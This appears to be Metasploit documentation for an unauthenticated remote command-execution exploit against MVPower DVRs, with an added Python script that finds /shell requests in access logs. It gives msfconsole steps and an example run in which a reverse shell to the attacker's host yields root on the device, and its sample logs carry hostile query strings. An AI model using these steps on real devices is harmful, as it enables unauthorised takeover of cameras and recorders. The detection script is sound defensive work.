Vulnerable Application
This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands supplied in the query string.
This module was tested successfully on an MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17).
The TV-7108HE model is also reportedly affected, but untested.
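For defenders, the behaviour described above can be hunted for in HTTP logs. The following is an added example, not part of the module or its original documentation: it flags requests that reach the 'shell' file with a query string. It assumes Common Log Format lines from a proxy or sensor in front of the DVR and that the file is served as /shell from the web root; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Assumption: the 'shell' file is served from the web root as /shell.
SHELL_PATH = "/shell"

# Common Log Format: src ident user [timestamp] "METHOD target HTTP/x.y" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def find_shell_requests(lines):
    """Return one finding per request that hit the shell file with a query string."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        parts = urlsplit(m["target"])
        # Decode percent-encoding so an encoded path still compares equal.
        if unquote(parts.path) != SHELL_PATH or not parts.query:
            continue
        findings.append({
            "src": m["src"],
            "time": m["ts"],
            # The whole query string is what the device would run; decode it for triage.
            "command": unquote_plus(parts.query),
            "status": int(m["status"]),
        })
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Feb/2017:23:59:30 -0500] "GET /shell?id HTTP/1.1" 200 48',
    '198.51.100.7 - - [21/Feb/2017:23:59:31 -0500] "GET /shell?uname%20-a HTTP/1.1" 200 61',
    '192.0.2.10 - - [21/Feb/2017:23:58:02 -0500] "GET /index.html HTTP/1.1" 200 1024',
    '192.0.2.10 - - [21/Feb/2017:23:58:05 -0500] "GET /shell HTTP/1.1" 200 0',
    '192.0.2.10 - - [21/Feb/2017:23:58:09 -0500] "GET /js/shell.js?v=2 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for f in find_shell_requests(SAMPLE_LOG):
        print(f'{f["time"]} {f["src"]} status={f["status"]} command={f["command"]!r}')
```

Because the vulnerability is unauthenticated, any match from an address outside the management network is worth investigating regardless of the response status.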
Verification Steps
- Start msfconsole
- Do: use exploit/linux/http/mvpower_dvr_shell_exec
- Do: set rhost [IP]
- Do: set lhost [IP]
- Do: run
- You should get a session
Example Run
msf exploit(mvpower_dvr_shell_exec) > run
[*] Started reverse TCP handler on 10.1.1.197:4444
[*] 10.1.1.191:80 - Connecting to target
[+] 10.1.1.191:80 - Target is vulnerable!
[*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq
[*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq
[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 10.1.1.191
OS : (Linux 3.0.8)
Architecture : armv7l
Meterpreter : armle/linux
meterpreter >